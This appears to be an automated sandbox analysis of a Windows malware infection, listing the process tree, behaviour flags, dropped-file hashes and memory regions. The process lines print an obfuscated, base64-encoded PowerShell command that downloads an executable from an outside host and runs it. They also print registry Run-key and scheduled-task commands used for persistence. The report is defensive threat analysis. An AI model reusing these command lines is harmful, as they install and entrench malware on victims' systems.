C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSheLL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Users\Admin\AppData\Local\Temp\ei.exe"C:\Users\Admin\AppData\Local\Temp\ei.exe"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"6⤵
- Adds Run key to start application
PID:1976 -
C:\Users\Admin\AppData\Roaming\expo.exe"C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Roaming\ammero.exe"C:\Users\Admin\AppData\Roaming\ammero.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "UDP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmpFAE1.tmp"7⤵
- Creates scheduled task(s)
PID:1388 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "UDP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpFC68.tmp"7⤵
- Creates scheduled task(s)
PID:1556
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\tmpFAE1.tmpMD5
f7eb19c49b51cdff67a25c6876a78241
SHA16d86be501c2fb57b50292a55d3983b7eee8a688d
SHA256c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
SHA5121e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740
-
C:\Users\Admin\AppData\Local\Temp\tmpFC68.tmpMD5
c4aecdef99eba873119e79616df3f4b0
SHA1b1b3af52655fb633eed909dfed05b64fbbfac37c
SHA25624fd0d87bea36a024449a95f808aaa174e4ed9003cb8a427b67c02411b8a2e0b
SHA512e3f44b07267fccf4f5abd4efe80f2b037ddadc4cb898bdfca9d21ac5d79fcac828950065c2060d3ce125ee971fc3096183afee5287ba9951fbbda7257d8ed8d4
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
memory/392-101-0x0000000000440000-0x0000000000459000-memory.dmpFilesize
100KB
-
memory/392-91-0x000000000041E792-mapping.dmp
-
memory/392-90-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/392-93-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/392-95-0x0000000000820000-0x0000000000821000-memory.dmpFilesize
4KB
-
memory/392-100-0x00000000003F0000-0x00000000003F5000-memory.dmpFilesize
20KB
-
memory/392-102-0x00000000004A0000-0x00000000004A3000-memory.dmpFilesize
12KB
-
memory/612-53-0x000000002FFB1000-0x000000002FFB4000-memory.dmpFilesize
12KB
-
memory/612-103-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/612-55-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/612-54-0x0000000071B11000-0x0000000071B13000-memory.dmpFilesize
8KB
-
memory/680-65-0x0000000004D10000-0x0000000004D11000-memory.dmpFilesize
4KB
-
memory/680-62-0x0000000000000000-mapping.dmp
-
memory/680-63-0x0000000001030000-0x0000000001031000-memory.dmpFilesize
4KB
-
memory/680-66-0x00000000006B0000-0x00000000006D1000-memory.dmpFilesize
132KB
-
memory/680-67-0x0000000004D11000-0x0000000004D12000-memory.dmpFilesize
4KB
-
memory/896-57-0x0000000000000000-mapping.dmp
-
memory/896-58-0x0000000075651000-0x0000000075653000-memory.dmpFilesize
8KB
-
memory/896-60-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/896-59-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/896-61-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/1328-68-0x0000000000000000-mapping.dmp
-
memory/1388-96-0x0000000000000000-mapping.dmp
-
memory/1556-98-0x0000000000000000-mapping.dmp
-
memory/1728-89-0x0000000001ED0000-0x0000000001ED1000-memory.dmpFilesize
4KB
-
memory/1728-84-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/1728-80-0x0000000000000000-mapping.dmp
-
memory/1800-56-0x0000000000000000-mapping.dmp
-
memory/1948-71-0x0000000000000000-mapping.dmp
-
memory/1948-86-0x0000000004C70000-0x0000000004C71000-memory.dmpFilesize
4KB
-
memory/1948-78-0x0000000004D91000-0x0000000004D92000-memory.dmpFilesize
4KB
-
memory/1948-74-0x0000000000800000-0x0000000000801000-memory.dmpFilesize
4KB
-
memory/1948-82-0x0000000004840000-0x000000000484B000-memory.dmpFilesize
44KB
-
memory/1948-76-0x0000000004D90000-0x0000000004D91000-memory.dmpFilesize
4KB
-
memory/1976-69-0x0000000000000000-mapping.dmp